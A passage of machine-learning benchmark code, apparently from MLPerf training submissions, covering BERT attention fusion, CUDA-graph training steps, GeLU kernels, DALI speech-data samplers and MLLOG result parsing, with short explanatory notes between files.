flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
if FLAGS.use_xla and FLAGS.manual_fp16:
print('WARNING! Combining --use_xla with --manual_fp16 may prevent convergence.')
print(' This warning message will be removed when the underlying')
print(' issues have been fixed and you are running a TF version')
print(' that has that fix.')
tf.compat.v1.app.run()
```
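The standalone evaluation loop above walks the TensorFlow checkpoint index file and, in the distributed branch, weights each rank's masked_lm_accuracy by its share of the 10,000 eval samples before an allreduce. Below is a minimal sketch of the checkpoint-index parsing as a standalone helper; the function name and the `output_dir` argument are illustrative, not part of the script above.

```python
def list_checkpoints(output_dir):
    # TF writes an index file with lines such as
    #   all_model_checkpoint_paths: "model.ckpt-6365"
    # collect the non-zero-step checkpoints, as the evaluation loop above does
    paths = []
    with open(output_dir + "/checkpoint", "r") as f:
        for line in f:
            key, value = line.split(":", 1)
            if key == "all_model_checkpoint_paths":
                name = value.strip().strip('"')
                step = int(name.split("-")[-1])
                if step > 0:
                    paths.append(output_dir + "/" + name)
    return paths
```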
#### File: implementations/implementation_closed/fmha.py
```python
import torch
import torch.nn.functional as F
from apex.contrib.fmha import FMHAFun
from collections import OrderedDict
import numpy as np
class TestParam(torch.nn.Parameter):
def __init__(self, data, requires_grad=True):
super(TestParam, self).__init__()
self.data = data
self.requires_grad = requires_grad
self.tag = 'qkv'
self.counter = 0
class NoopCat(torch.autograd.Function):
@staticmethod
def forward(ctx, Wq, Wk, Wv, Bq, Bk, Bv, Wqkv, Bqkv, hidden_size):
assert not Wqkv.requires_grad and not Bqkv.requires_grad, "Wqkv and Bqkv must not require grad"
Wtmp = Wqkv.view(3, hidden_size, hidden_size)
Btmp = Bqkv.view(3, hidden_size)
Wq.data = Wtmp[0,:,:]
Wk.data = Wtmp[1,:,:]
Wv.data = Wtmp[2,:,:]
Bq.data = Btmp[0,:]
Bk.data = Btmp[1,:]
Bv.data = Btmp[2,:]
Wtmp = Wqkv.new()
Wtmp.set_(Wqkv.storage(), Wqkv.storage_offset(), Wqkv.size(), Wqkv.stride())
Wtmp.requires_grad = True
Btmp = Bqkv.new()
Btmp.set_(Bqkv.storage(), Bqkv.storage_offset(), Bqkv.size(), Bqkv.stride())
Btmp.requires_grad = True
ctx.save_for_backward(Wqkv, Bqkv, Wq, Wk, Wv, Bq, Bk, Bv)
ctx.hidden_size = hidden_size
return Wtmp, Btmp
@staticmethod
def backward(ctx, dWqkv, dBqkv):
Wqkv, Bqkv, Wq, Wk, Wv, Bq, Bk, Bv = ctx.saved_tensors
Wtmp = Wqkv.view(3, ctx.hidden_size, ctx.hidden_size)
Btmp = Bqkv.view(3, ctx.hidden_size)
Wq.data = Wtmp[0,:,:]
Wk.data = Wtmp[1,:,:]
Wv.data = Wtmp[2,:,:]
Bq.data = Btmp[0,:]
Bk.data = Btmp[1,:]
Bv.data = Btmp[2,:]
dWtmp = dWqkv.view(3, ctx.hidden_size, ctx.hidden_size)
dBtmp = dBqkv.view(3, ctx.hidden_size)
return dWtmp[0, :,:], dWtmp[1, :,:], dWtmp[2, :,:], dBtmp[0,:], dBtmp[1,:], dBtmp[2,:], None, None, None
class FMHA(torch.nn.Module):
def __init__(self, config):
super(FMHA, self).__init__()
self.p_dropout = config.attention_probs_dropout_prob
self.h = config.num_attention_heads
self.hidden_size = config.hidden_size
self.d = self.hidden_size // self.h
assert self.d * self.h == self.hidden_size, "Invalid hidden size/num_heads"
self.register_buffer("Wqkv",torch.zeros(3 * config.hidden_size, config.hidden_size))
self.register_buffer("Bqkv",torch.zeros(3 * config.hidden_size))
self.Wqkv.requires_grad = False
self.Bqkv.requires_grad = False
self.Wqkv.detach()
self.Bqkv.detach()
with torch.no_grad():
params = []
Wtmp = self.Wqkv.view(3, self.hidden_size, self.hidden_size)
Btmp = self.Bqkv.view(3, self.hidden_size)
for tag, idx in zip('qkv', range(3)):
params.append(('W' + tag, torch.nn.Parameter(Wtmp[idx,:,:])))
params.append(('B' + tag, torch.nn.Parameter(Btmp[idx,:])))
self.param_views = OrderedDict(params)
self._reset_param_views()
def prep_weights(state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
Wq = state_dict.pop(prefix + 'query.weight')
bq = state_dict.pop(prefix + 'query.bias')
Wk = state_dict.pop(prefix + 'key.weight')
bk = state_dict.pop(prefix + 'key.bias')
Wv = state_dict.pop(prefix + 'value.weight')
bv = state_dict.pop(prefix + 'value.bias')
weight = torch.cat([Wq.view(self.h, self.d, self.hidden_size),
Wk.view(self.h, self.d, self.hidden_size),
Wv.view(self.h, self.d, self.hidden_size)],
dim=0).reshape(config.hidden_size*3,config.hidden_size).contiguous()
bias = torch.cat([bq.view(self.h, self.d),
bk.view(self.h, self.d),
bv.view(self.h, self.d)],
dim=0).reshape(3*config.hidden_size).contiguous()
state_dict[prefix + 'Wqkv'] = weight
state_dict[prefix + 'Bqkv'] = bias
state_dict[prefix + 'Wq'] = Wq
state_dict[prefix + 'Wk'] = Wk
state_dict[prefix + 'Wv'] = Wv
state_dict[prefix + 'Bq'] = bq
state_dict[prefix + 'Bk'] = bk
state_dict[prefix + 'Bv'] = bv
self._register_load_state_dict_pre_hook(prep_weights)
def _reset_param_views(self):
with torch.no_grad():
Wtmp = self.Wqkv.view(3, self.hidden_size, self.hidden_size)
Btmp = self.Bqkv.view(3, self.hidden_size)
for tag, idx in zip('qkv', range(3)):
self.param_views['W' + tag].data = Wtmp[idx, :, :]
self.param_views['B' + tag].data = Btmp[idx, :]
def _apply(self, fn):
with torch.no_grad():
self.Wqkv = fn(self.Wqkv)
if self.Wqkv.grad is not None:
self.Wqkv.grad = fn(self.Wqkv.grad)
self.Bqkv = fn(self.Bqkv)
if self.Bqkv.grad is not None:
self.Bqkv.grad = fn(self.Bqkv.grad)
self._reset_param_views()
@property
def _parameters(self):
self._reset_param_views()
return self.param_views
@_parameters.setter
def _parameters(self, _):
if 'Wqkv' in self.__dict__ and self.Wqkv is not None and self.Wqkv.device == torch.device('cuda:0'):
import traceback
traceback.print_stack()
pass
def forward(self, hidden_states, cu_seqlens, seqlens, max_s, is_training=True):
Wqkv, Bqkv = NoopCat.apply(*[self.param_views[x + y] for x in 'WB' for y in 'qkv'], self.Wqkv, self.Bqkv, self.hidden_size)
qkv = F.linear(hidden_states, Wqkv, Bqkv)
p_dropout = self.p_dropout
ctx = FMHAFun.apply(qkv.view(-1, 3, self.h, self.d), cu_seqlens, seqlens, p_dropout, max_s, is_training)
return ctx.view(-1, self.hidden_size)
```
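The FMHA module keeps a single fused `Wqkv` buffer and exposes `Wq`/`Wk`/`Wv` as views into it, so one GEMM produces all three projections while the optimizer still sees per-projection parameters. The toy sketch below shows only the aliasing idea; tensor sizes and names are made up for illustration and this is not the NoopCat machinery itself.

```python
import torch
import torch.nn.functional as F

hidden = 4
# one contiguous [3*hidden, hidden] buffer holds Wq, Wk and Wv stacked together
Wqkv = torch.randn(3 * hidden, hidden)
Wq, Wk, Wv = Wqkv.view(3, hidden, hidden)      # views share storage, no copy

x = torch.randn(2, hidden)
qkv = F.linear(x, Wqkv)                        # a single GEMM covers q, k and v
q, k, v = qkv.split(hidden, dim=-1)

# projecting with the individual views gives the same result
assert torch.allclose(q, x @ Wq.t())
assert torch.allclose(k, x @ Wk.t())
assert torch.allclose(v, x @ Wv.t())
```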
#### File: implementations/implementation_closed/fwd_loss_bwd_trainer.py
```python
import torch
from function import graph
from apex import amp
class FwdLossBwdTrainer():
def __init__(self, args, grad_scaler):
super(FwdLossBwdTrainer, self).__init__()
self.args = args
self.grad_scaler = grad_scaler
self.capture_stream = torch.cuda.Stream()
self.send_stats_in_parallel = False
self.stats_stream = torch.cuda.Stream()
self.loss_cpu = torch.tensor(0.0, dtype=torch.float32, device='cpu').pin_memory()
self.mlm_acc_cpu = torch.tensor(0.0, dtype=torch.float32, device='cpu').pin_memory()
def capture_bert_model_segment_graph(self, bert_model, use_cuda_graph):
# eval batch depends on the rank, since eval sample count isn't divisible by world size
rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
eval_batch_min = self.args.num_eval_examples // world_size
remainder = self.args.num_eval_examples % world_size
if rank<remainder:
eval_batch = eval_batch_min + 1
else:
eval_batch = eval_batch_min
eval_batch = min(eval_batch, self.args.eval_batch_size)
batches_to_graph = [eval_batch, self.args.train_batch_size]
bert_model_segment = bert_model.bert_model_segment
sample_model_train = [
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
]
sample_model_eval = [
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
]
bert_model_segment = graph(bert_model_segment,
tuple(t.clone() for t in sample_model_train),
tuple(t.clone() for t in sample_model_eval) if self.args.eval_batch_size * world_size >= self.args.num_eval_examples else None,
self.capture_stream,
warmup_iters=8,
warmup_only=(not use_cuda_graph))
bert_head_segment = bert_model.heads_only_segment
sample_head_train = [
torch.ones(self.args.train_batch_size, self.args.max_seq_length, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(self.args.train_batch_size, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(self.args.train_batch_size, dtype=torch.int64, device=self.args.device),
]
sample_head_eval = [
torch.ones(eval_batch, self.args.max_seq_length, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(eval_batch, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(eval_batch, dtype=torch.int64, device=self.args.device),
]
sample_head_tuple_train = tuple([sample_head_train[0].clone().requires_grad_(), sample_head_train[1].clone().requires_grad_(), sample_head_train[2].clone(), sample_head_train[3].clone()])
sample_head_tuple_eval = tuple([sample_head_eval[0].clone(), sample_head_eval[1].clone(), sample_head_eval[2].clone(), sample_head_eval[3].clone()])
bert_head_segment = graph(bert_head_segment,
sample_head_tuple_train,
sample_head_tuple_eval if self.args.eval_batch_size * world_size >= self.args.num_eval_examples else None,
self.capture_stream,
warmup_iters=8,
warmup_only=(not use_cuda_graph))
return bert_model
def eval_step(self, batch, model):
model.eval()
input_ids, segment_ids, input_mask, masked_lm_labels, next_sentence_labels = batch
loss = None
mlm_acc = None
loss, mlm_acc, num_valid = model(input_ids, segment_ids, input_mask,
masked_lm_labels, next_sentence_labels)
return loss, mlm_acc, num_valid
def step(self, step, batch, model, optimizer):
input_ids, segment_ids, input_mask, masked_lm_labels, next_sentence_labels = batch
loss = None
mlm_acc = None
loss, mlm_acc, _ = model(input_ids, segment_ids, input_mask,
masked_lm_labels, next_sentence_labels)
if self.send_stats_in_parallel:
self.stats_stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stats_stream):
self.loss_cpu.copy_(loss.detach(), non_blocking=True)
self.mlm_acc_cpu.copy_(mlm_acc.detach(), non_blocking=True)
if self.args.bypass_amp:
loss.backward()
elif self.args.distributed_lamb:
optimizer._lazy_init_stage1()
self.grad_scaler.scale(loss).backward()
optimizer._lazy_init_stage2()
else:
with amp.scale_loss(loss, optimizer, delay_overflow_check=self.args.allreduce_post_accumulation) as scaled_loss:
scaled_loss.backward()
if self.send_stats_in_parallel:
self.stats_stream.synchronize()
loss = self.loss_cpu
mlm_acc = self.mlm_acc_cpu
return loss, mlm_acc
```
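In `capture_bert_model_segment_graph`, the eval batch differs per rank because the eval sample count is not divisible by the world size: the first `remainder` ranks take one extra example, capped at `eval_batch_size`. A small standalone sketch of that split follows; the helper name is hypothetical.

```python
def per_rank_eval_batches(num_eval_examples, world_size, eval_batch_size):
    # first `remainder` ranks take one extra example, capped at eval_batch_size
    base = num_eval_examples // world_size
    remainder = num_eval_examples % world_size
    return [min(base + (1 if rank < remainder else 0), eval_batch_size)
            for rank in range(world_size)]

# e.g. 10000 eval examples across 8 ranks -> 1250 per rank
print(per_rank_eval_batches(10000, 8, 1536))
```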
#### File: model/layers/activations.py
```python
import math
import torch
from torch import nn
# Fused GeLU
torch._C._jit_set_profiling_mode(False)
torch._C._jit_set_profiling_executor(False)
torch._C._jit_override_can_fuse_on_cpu(True)
torch._C._jit_override_can_fuse_on_gpu(True)
# 1/sqrt(2*pi)-> 0.3989423
# 1/sqrt(2) -> 0.70710678
# sqrt(2/pi) -> 0.79788456
# this function is a tanh approximation of gelu
# actual gelu is:
# x * 0.5 * (1.0 + torch.erf(x * 0.70710678))
@torch.jit.script
def bias_gelu(bias, y):
x = bias + y
return x * 0.5 * (1.0 + torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x)))
# gradient of tanh approximation of gelu
# gradient of actual gelu is:
# 0.5 * (1. + torch.erf(x * 0.70710678)) + 0.3989423 * x * torch.exp(-0.5 * x * x)
@torch.jit.script
def bias_gelu_back(g, bias, y):
x = bias + y
tanh_out = torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x))
# sqrt(2/pi) * 3 * 0.044715 -> 0.1070322243
ff = 0.5 * x * ((1 - tanh_out * tanh_out) * (0.79788456 + 0.1070322243 * x * x)) + 0.5 * (1 + tanh_out)
return ff*g
class GeLUFunction(torch.autograd.Function):
@staticmethod
# bias is an optional argument
def forward(ctx, input, bias):
ctx.save_for_backward(input, bias)
return bias_gelu(bias, input)
@staticmethod
def backward(ctx, grad_output):
input, bias = ctx.saved_tensors
tmp = bias_gelu_back(grad_output, bias, input)
return tmp, tmp
bias_gelu_impl = GeLUFunction.apply
# Swish
def swish(x):
return x * torch.sigmoid(x)
# Fast GeLU
def fast_gelu(x):
pi = 3.1415926535897932
cdf = 0.5 * (1.0 + torch.tanh((math.sqrt(2 / pi) * (x + 0.044715 * torch.pow(x, 3)))))
return x * cdf
ACT2FN = {
"gelu": fast_gelu,
"bias_gelu": bias_gelu_impl,
"relu": torch.nn.functional.relu,
"swish": swish
}
```
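The JIT-scripted `bias_gelu` and `fast_gelu` both use the tanh approximation noted in the comments, while the exact GELU uses erf. A quick numerical comparison of the two forms is sketched below; it is a standalone check, not part of the module.

```python
import torch

x = torch.linspace(-4.0, 4.0, steps=101)
exact = x * 0.5 * (1.0 + torch.erf(x * 0.70710678))
approx = x * 0.5 * (1.0 + torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x)))
# the tanh approximation tracks the erf form closely over this range
print((exact - approx).abs().max())   # well below 1e-2
```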
#### File: data/dali/sampler.py
```python
import os
import numpy as np
import torch
from common.helpers import print_once
def hash_list_of_strings(li):
return str(abs(hash(''.join(li))))
def _parse_json(json_path: str, start_label=0, predicate=lambda json: True, tokenized_transcript=False):
"""
Parses json file to the format required by DALI
Args:
json_path: path to json file
start_label: the label from which DALI starts assigning consecutive int numbers to every transcript
predicate: function that accepts a sample descriptor (i.e. json dictionary) as an argument.
If the predicate for a given sample returns True, it will be included in the dataset.
Returns:
output_files: dictionary that maps file name to label assigned by DALI
transcripts: dictionary that maps label assigned by DALI to the transcript
"""
import json
global cnt
with open(json_path) as f:
librispeech_json = json.load(f)
output_files = {}
transcripts = {}
curr_label = start_label
for original_sample in librispeech_json:
if not predicate(original_sample):
continue
transcripts[curr_label] = original_sample['tokenized_transcript' if tokenized_transcript else 'transcript']
output_files[original_sample['files'][-1]['fname']] = dict(
label=curr_label,
duration=original_sample['original_duration'],
)
curr_label += 1
return output_files, transcripts
def _parse_pkl(pkl_path: str, start_label=0, predicate=lambda pkl: True, tokenized_transcript=True):
if not tokenized_transcript:
raise NotImplementedError("pickle input only works with tokenized_transcript")
import pickle
with open(pkl_path, 'rb') as f:
librispeech_pkl = pickle.load(f)
output_files = {}
transcripts = {}
curr_label = start_label
for original_sample in librispeech_pkl:
if not predicate(original_sample):
continue
transcripts[curr_label] = original_sample['tokenized_transcript']
output_files[original_sample['fname']] = dict(
label=curr_label,
duration=original_sample['original_duration'],
)
curr_label += 1
return output_files, transcripts
class SimpleSampler:
def __init__(self, config_data, dist_sampler=False):
self.file_list_path = None
self.files, self.labels = [], []
self.dataset_size = None
self.dist_sampler = dist_sampler
self.rank = torch.distributed.get_rank() if torch.distributed.is_initialized() else 0
self.config_data = config_data
def write_file_list(self, names, labels):
with open(self.file_list_path, 'w') as f:
f.writelines(f'{name} {label}\n' for name, label in zip(names, labels))
def get_file_list_path(self):
assert self.file_list_path, 'File list not initialized. Run make_file_list first'
return self.file_list_path
def get_dataset_size(self):
assert self.dataset_size, 'Dataset size not known. Run make_file_list first'
return self.dataset_size
def is_sampler_random(self):
return False
def process_output_files(self, output_files):
print_once('Launching simple sampler')
self.dataset_size = len(output_files)
self.max_duration = max(entry['duration'] for _, entry in output_files.items())
return [path for path, _ in output_files.items()], \
[entry['label'] for _, entry in output_files.items()]
def make_file_list(self, output_files, json_names):
file_name = hash_list_of_strings(json_names)
if self.dist_sampler:
file_name += '__%d' % self.rank
self.file_list_path = os.path.join(
"/tmp",
"rnnt_dali.file_list." + file_name
)
self.write_file_list(*self.process_output_files(output_files))
def make_files(self, output_files):
self.files, self.labels = self.process_output_files(output_files)
def sample(self, file_names, in_mem_file_list, tokenized_transcript):
output_files, self.transcripts = {}, {}
max_duration = self.config_data['max_duration']
for file in file_names:
if file.endswith('.json'):
parse_func = _parse_json
elif file.endswith('.pkl'):
parse_func = _parse_pkl
else:
raise NotImplementedError("Please supply supported input data file type: json or pickle")
of, tr = parse_func(
file if file[0] == '/' else os.path.join(dataset_path, file),
len(output_files),
predicate=lambda file: file['original_duration'] <= max_duration,
tokenized_transcript=tokenized_transcript,
)
output_files.update(of)
self.transcripts.update(tr)
if in_mem_file_list:
self.make_files(output_files)
else:
self.make_file_list(output_files, file_names)
class BucketingSampler(SimpleSampler):
def __init__(self, config_data, num_buckets, batch_size, num_workers, num_epochs, seed, dist_sampler, pre_sort):
super(BucketingSampler, self).__init__(config_data, dist_sampler)
assert not pre_sort, "pre_sort not supported in BucketingSampler"
self.rng = np.random.default_rng(seed=seed)
self.num_buckets = num_buckets
self.num_epochs = num_epochs
self.batch_size = batch_size
self.num_workers = num_workers
def process_output_files(self, output_files):
print_once('Launching bucketing sampler')
names = list(output_files)
lengths = [output_files[name]['duration'] for name in names]
labels = np.array([output_files[name]['label'] for name in names])
len_ids = np.argsort(lengths)
buckets = np.array_split(len_ids, self.num_buckets)
gbs = self.batch_size * self.num_workers
shuffled_buckets = np.array([
perm
for _ in range(self.num_epochs) # for every epoch
for bucket in buckets # from every bucket
for perm in self.rng.permutation(bucket) # pick samples in random order
])
# drop last batch
epochs = np.reshape(shuffled_buckets, [self.num_epochs, -1])
to_drop = epochs.shape[1] - (epochs.shape[1] // gbs * gbs)
for epoch in epochs:
dropped_idxs = self.rng.choice(epochs.shape[1], to_drop, replace=False)
if to_drop > 0:
epoch[dropped_idxs] = -1
epochs = epochs[epochs != -1].reshape(self.num_epochs, -1)
self.dataset_size = epochs.shape[1]
epochs_iters_batch = np.reshape(epochs, [self.num_epochs, -1, gbs])
# shuffle iterations in epochs preserving batches
for epoch in epochs_iters_batch:
self.rng.shuffle(epoch, axis=0)
epochs_iters_batch_worker = np.reshape(
epochs_iters_batch,
[self.num_epochs, -1, self.batch_size, self.num_workers]
)
workers_epochs_iters_batch = np.moveaxis(epochs_iters_batch_worker, -1, 0)
if self.dist_sampler:
order = workers_epochs_iters_batch[self.rank].flatten()
else:
order = workers_epochs_iters_batch.flatten()
return np.array(names) [order].tolist(), \
np.array(labels)[order].tolist()
def is_sampler_random(self):
return True
class VectorizedBucketingSampler(SimpleSampler):
def __init__(self, config_data, num_buckets, batch_size, num_workers, num_epochs, seed, dist_sampler, pre_sort):
super(VectorizedBucketingSampler, self).__init__(config_data, dist_sampler)
self.seed = seed
self.num_buckets = num_buckets
self.num_epochs = num_epochs
self.batch_size = batch_size
self.num_workers = num_workers
self.pre_sort = pre_sort
def process_output_files(self, output_files):
print_once('Launching vectorized bucketing sampler')
names = list(output_files)
lengths = [output_files[name]['duration'] for name in names]
labels = np.array([output_files[name]['label'] for name in names])
dur = torch.tensor(lengths, device='cuda')
len_ids = dur.argsort()
buckets = len_ids.tensor_split(self.num_buckets)
padded_buckets = torch.nn.utils.rnn.pad_sequence(buckets, padding_value=-1, batch_first=True)
with torch.random.fork_rng(devices=range(torch.cuda.device_count())):
torch.random.manual_seed(self.seed)
self.seed += 1
buckets_shuffler = torch.rand(self.num_epochs, *padded_buckets.shape, device='cuda')
shuffle_columnvise = buckets_shuffler.argsort(dim=2)
epochs, num_buckets, samples = shuffle_columnvise.shape
shift = torch.arange(0, samples*num_buckets, samples, device='cuda').view(1, -1, 1)
shuffle_globalvise = shuffle_columnvise + shift
shuffled_buckets = padded_buckets.take(shuffle_globalvise)
gbs = self.batch_size * self.num_workers
unpadded = shuffled_buckets[shuffled_buckets != -1].view(epochs, -1)
epochs, samples = unpadded.shape
to_drop = samples - (samples // gbs * gbs)
mask = torch.ones_like(unpadded, dtype=bool, device='cuda')
removed_samples = torch.rand(unpadded.shape, device='cuda').argsort(dim=1)[:, :to_drop]
epoch_idx = torch.arange(self.num_epochs).view(-1, 1).expand(self.num_epochs, to_drop)
mask[epoch_idx.flatten(), removed_samples.flatten()] = False
batch_aligned = unpadded[mask].view(self.num_epochs, -1, self.batch_size)
_, num_iterations, _ = batch_aligned.shape
epochs, num_batches, bs = batch_aligned.view(self.num_epochs, -1, gbs).shape
new_order = torch.rand(epochs, num_batches, device='cuda')
nwo = new_order.argsort(dim=1).view(-1, num_batches, 1) * bs \
+ torch.arange(0, bs, 1, device='cuda').view(1,1,-1) \
+ torch.arange(0, epochs*num_batches*bs, num_batches*bs,device='cuda').view(-1, 1, 1)
out = batch_aligned.take(nwo)
if self.pre_sort:
# At this point, the mini-batch has been formed. Now we can arrange work to each GPU
pert_range = self.config_data['speed_perturbation']['max_rate'] - self.config_data['speed_perturbation']['min_rate']
self.pert_coeff = torch.rand(out.size(0), out.size(1), out.size(2), device="cuda") * pert_range + self.config_data['speed_perturbation']['min_rate']
dur_after_pert = dur[out] * self.pert_coeff
idx_asc = dur_after_pert.argsort(dim=-1)
idx_des = torch.flip(idx_asc, dims=[-1])
idx_mix = torch.ones_like(idx_asc)
# Assuming batch size is a multiple of 2.
idx_mix[:, :, ::2] = idx_asc[:, :, :idx_asc.size(-1) // 2]
idx_mix[:, :, 1::2] = idx_des[:, :, :idx_des.size(-1) // 2]
out = torch.gather(out, 2, idx_mix)
self.pert_coeff = torch.gather(self.pert_coeff, 2, idx_mix)
# to test, try
# dur[out] * self.pert_coeff
if self.dist_sampler:
out = out.view(epochs, -1, self.num_workers, self.batch_size).moveaxis(2, 0)
out = out[self.rank]
if self.pre_sort:
self.pert_coeff = self.pert_coeff.view(epochs, -1, self.num_workers, self.batch_size).moveaxis(2, 0)
self.pert_coeff = self.pert_coeff[self.rank].cpu()
self.dataset_size = num_iterations * self.batch_size
out = out.cpu()
return np.array(names) [out.flatten()].tolist(), \
np.array(labels)[out.flatten()].tolist()
def is_sampler_random(self):
return True
```
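Both bucketing samplers follow the same recipe: sort samples by duration, split the sorted order into buckets, shuffle within each bucket, then drop a few indices so every epoch is a whole number of global batches. The toy NumPy sketch below shows that recipe with made-up names and sizes; it is not the sampler API above.

```python
import numpy as np

rng = np.random.default_rng(0)
durations = rng.uniform(1.0, 15.0, size=23)   # pretend utterance durations
num_buckets, global_batch = 4, 4

order = np.argsort(durations)                          # sort by duration
buckets = np.array_split(order, num_buckets)           # similar lengths per bucket
shuffled = np.concatenate([rng.permutation(b) for b in buckets])
usable = len(shuffled) - len(shuffled) % global_batch  # drop the remainder
batches = shuffled[:usable].reshape(-1, global_batch)
print(batches.shape)   # (5, 4): each batch holds samples of similar length
```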
#### File: compliance_checker/mlp_parser/ruleset_100.py
```python
from __future__ import print_function
import collections
import json
import re
import sys
from io import open
LogLine = collections.namedtuple('LogLine', [
'full_string', # the complete line as a string
'timestamp', # seconds as a float, e.g. 1234.567
'key', # the string key
'value', # the parsed value associated with the tag, or None if no value
'lineno', # the line number in the file
])
TOKEN = ':::MLLOG '
def parse_line(line):
if not line.startswith(TOKEN):
return None
return json.loads(line[len(TOKEN):])
def string_to_logline(lineno, string):
''' Returns a LogLine or raises a ValueError '''
m = parse_line(string)
if m is None:
raise ValueError('does not match regex')
args = []
args.append(string) # full string
ts = float(m['time_ms']) # may raise error, e.g. "1.2.3"
# TODO check for weird values
args.append(ts)
args.append(m['key']) # key
j = { 'value': m['value'], 'metadata': m['metadata'] }
args.append(j)
args.append(lineno)
return LogLine(*args)
def parse_file(filename):
''' Reads a file by name and returns list of loglines and list of errors'''
with open(filename, encoding='latin-1') as f:
return parse_generator(f)
def strip_and_dedup(gen):
lines = []
for l in gen:
if TOKEN not in l:
continue
lines.append(re.sub(".*"+TOKEN, TOKEN, l))
return lines
def parse_generator(gen):
''' Reads a generator of lines and returns (loglines, errors)
The list of errors are any parsing issues as a tuple (str_line, error_msg)
'''
loglines = []
failed = []
for lineno, line in enumerate(strip_and_dedup(gen)):
line = line.strip()
try:
ll = string_to_logline(lineno, line)
loglines.append(ll)
except ValueError as e:
failed.append((line, str(e)))
return loglines, failed
if __name__ == '__main__':
if len(sys.argv) != 2:
print('usage: mlp_parser.py FILENAME')
print(' tests parsing on the file.')
sys.exit(1)
filename = sys.argv[1]
lines, errors = parse_file(filename)
print('Parsed {} log lines with {} errors.'.format(len(lines), len(errors)))
if len(errors) > 0:
print('Lines which failed to parse:')
for line, error in errors:
print(' Following line failed: {}'.format(error))
print(line)
```
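Each MLLOG record is the `:::MLLOG ` token followed by a JSON payload, which is what `parse_line` strips and decodes. A one-record sketch of the same parsing is shown below; the sample line is made up.

```python
import json

TOKEN = ':::MLLOG '
sample = ':::MLLOG {"time_ms": 1614000000000, "key": "run_start", "value": null, "metadata": {"lineno": 1}}'

payload = json.loads(sample[len(TOKEN):])   # what parse_line does after the prefix check
print(payload['key'], payload['time_ms'], payload['metadata'])
```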
#### File: mlperf_logging/result_summarizer/result_summarizer.py
```python
from __future__ import print_function
import argparse
import copy
import glob
import json
import os
import re
import sys
from ..compliance_checker import mlp_compliance
from ..rcp_checker import rcp_checker
_ALLOWED_BENCHMARKS_V06 = [
'resnet',
'ssd',
'maskrcnn',
'gnmt',
'transformer',
'ncf',
'minigo',
]
_ALLOWED_BENCHMARKS_V07 = [
'bert',
'dlrm',
'gnmt',
'maskrcnn',
'minigo',
'resnet',
'ssd',
'transformer',
]
_ALLOWED_BENCHMARKS_V10 = [
'bert',
'dlrm',
'maskrcnn',
'minigo',
'resnet',
'ssd',
'rnnt',
'unet3d',
]
_RUN_START_REGEX = r':::MLLOG (.*"run_start",.*)'
_RUN_STOP_REGEX = r':::MLLOG (.*"run_stop",.*)'
def _get_sub_folders(folder):
sub_folders = [os.path.join(folder, sub_folder)
for sub_folder in os.listdir(folder)]
return [sub_folder
for sub_folder in sub_folders
if os.path.isdir(sub_folder)]
def _read_json_file(json_file):
with open(json_file, 'r') as f:
return json.load(f)
def _pretty_system_name(system_desc):
system_name = system_desc['system_name']
if system_name == 'tpu-v3':
chips = int(system_desc['accelerators_per_node']) * 2
return 'TPUv3.{}'.format(chips)
return system_name
def _linkable_system_name(system_desc):
system_name = system_desc['system_name']
if system_name == 'tpu-v3':
chips = int(system_desc['accelerators_per_node']) * 2
return 'tpu-v3-{}'.format(chips)
return system_name
def _pretty_accelerator_model_name(system_desc):
accelerator_model_name = system_desc['accelerator_model_name']
if accelerator_model_name == 'tpu-v3':
return 'TPUv3'
return accelerator_model_name
def _pretty_framework(system_desc):
framework = system_desc['framework']
if 'TensorFlow' in framework:
commit_hash = re.search(r' commit hash = .*', framework)
if commit_hash:
return framework.replace(commit_hash.group(0), '')
return framework
def _benchmark_alias(benchmark):
if benchmark == 'mask':
return 'maskrcnn'
return benchmark
def _ruleset_url_prefix(ruleset):
short_ruleset = ruleset.replace('.0', '')
return 'https://github.com/mlperf/training_results_v{}'.format(short_ruleset)
def _details_url(system_desc, ruleset):
return '{ruleset_prefix}/blob/master/{submitter}/systems/{system}.json'.format(
ruleset_prefix=_ruleset_url_prefix(ruleset),
submitter=system_desc['submitter'],
system=_linkable_system_name(system_desc))
def _code_url(system_desc, ruleset):
return '{ruleset_prefix}/blob/master/{submitter}/benchmarks'.format(
ruleset_prefix=_ruleset_url_prefix(ruleset),
submitter=system_desc['submitter'])
def _row_key(system_desc):
system_name = '{}-{}-{}'.format(system_desc['division'], system_desc['system_name'], system_desc['framework'])
if system_name == 'tpu-v3':
chips = int(system_desc['accelerators_per_node']) * 2
return 'tpu-v3-{:04d}'.format(chips)
return system_name
def _read_mlperf_score(result_file, ruleset):
with open(result_file, 'r') as f:
result = f.read()
config_file = '{ruleset}/common.yaml'.format(ruleset=ruleset)
checker = mlp_compliance.make_checker(
ruleset=ruleset,
quiet=True,
werror=False)
valid, _, _, _ = mlp_compliance.main(result_file, config_file, checker)
if not valid:
return None
run_start = re.search(_RUN_START_REGEX, result)
if run_start is None:
raise Exception('Failed to match run_start!')
run_start = json.loads(run_start.group(1))['time_ms']
run_stop = re.search(_RUN_STOP_REGEX, result)
run_stop = json.loads(run_stop.group(1))['time_ms']
seconds = float(run_stop) - float(run_start)
minutes = seconds / 60 / 1000 # convert ms to minutes
return minutes
def _compute_olympic_average(scores, dropped_scores, max_dropped_scores):
"""Olympic average by dropping the top and bottom max_dropped_scores:
If max_dropped_scores == 1, then we compute a normal olympic score.
If max_dropped_scores > 1, then we drop more than one scores from the
top and bottom and average the rest.
